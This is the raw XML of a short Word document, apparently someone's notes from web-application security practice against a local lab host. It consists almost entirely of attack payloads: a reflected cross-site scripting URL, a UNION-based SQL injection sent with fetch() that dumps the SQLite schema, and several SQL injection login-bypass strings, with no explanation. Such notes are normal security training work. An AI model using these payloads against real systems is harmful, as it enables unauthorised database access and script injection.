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3BC3" w14:textId="06B33732" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC">
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00E22346">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://192.168.70.178:51571/restaurant/4?from=&lt;script&gt;alert(1)&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="003E5FDC">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7FE5A" w14:textId="171E6B8C" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC">
      <w:r w:rsidRPr="003E5FDC">
        <w:t>fetch("/rest/products/search?q=a')) UNION SELECT sql,2,3,4,5,6,7,8,9 FROM sqlite_master--")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91E907" w14:textId="48F2355B" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC">
      <w:r w:rsidRPr="003E5FDC">
        <w:t>fd8e9a29dab791197115b58061b215594211e72c1680f1eacc50b0394133a09f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6C97F2" w14:textId="77777777" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC" w:rsidP="003E5FDC">
      <w:r>
        <w:t xml:space="preserve">' OR '1'='1' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630E0CC2" w14:textId="77777777" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC" w:rsidP="003E5FDC">
      <w:r>
        <w:t xml:space="preserve">' OR 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D0C5342" w14:textId="77777777" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC" w:rsidP="003E5FDC">
      <w:r>
        <w:t xml:space="preserve">1 OR 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F058D3" w14:textId="4CE2CA37" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC" w:rsidP="003E5FDC">
      <w:r>
        <w:t>' OR 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA56496" w14:textId="77777777" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC" w:rsidP="003E5FDC">
      <w:r>
        <w:t xml:space="preserve">' OR '1'='1' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A10A149" w14:textId="77777777" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC" w:rsidP="003E5FDC">
      <w:r>
        <w:t xml:space="preserve">' OR 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0862B6" w14:textId="77777777" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC" w:rsidP="003E5FDC">
      <w:r>
        <w:t xml:space="preserve">1 OR 1=1 -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1832AACA" w14:textId="2BBF96E4" w:rsidR="003E5FDC" w:rsidRDefault="003E5FDC" w:rsidP="003E5FDC">
      <w:r>
        <w:t>' OR 1=1 #</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003E5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DC"/>
    <w:rsid w:val="001D7E71"/>
    <w:rsid w:val="003E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938E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{2C607CE5-911F-4B8C-9E46-D80B7838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F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70.178:51571/restaurant/4?from=%3cscript%3ealert(1)%3c/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Ranjita Venkatesh Nayak</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Ranjita Venkatesh Nayak</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-16T05:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-16T05:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>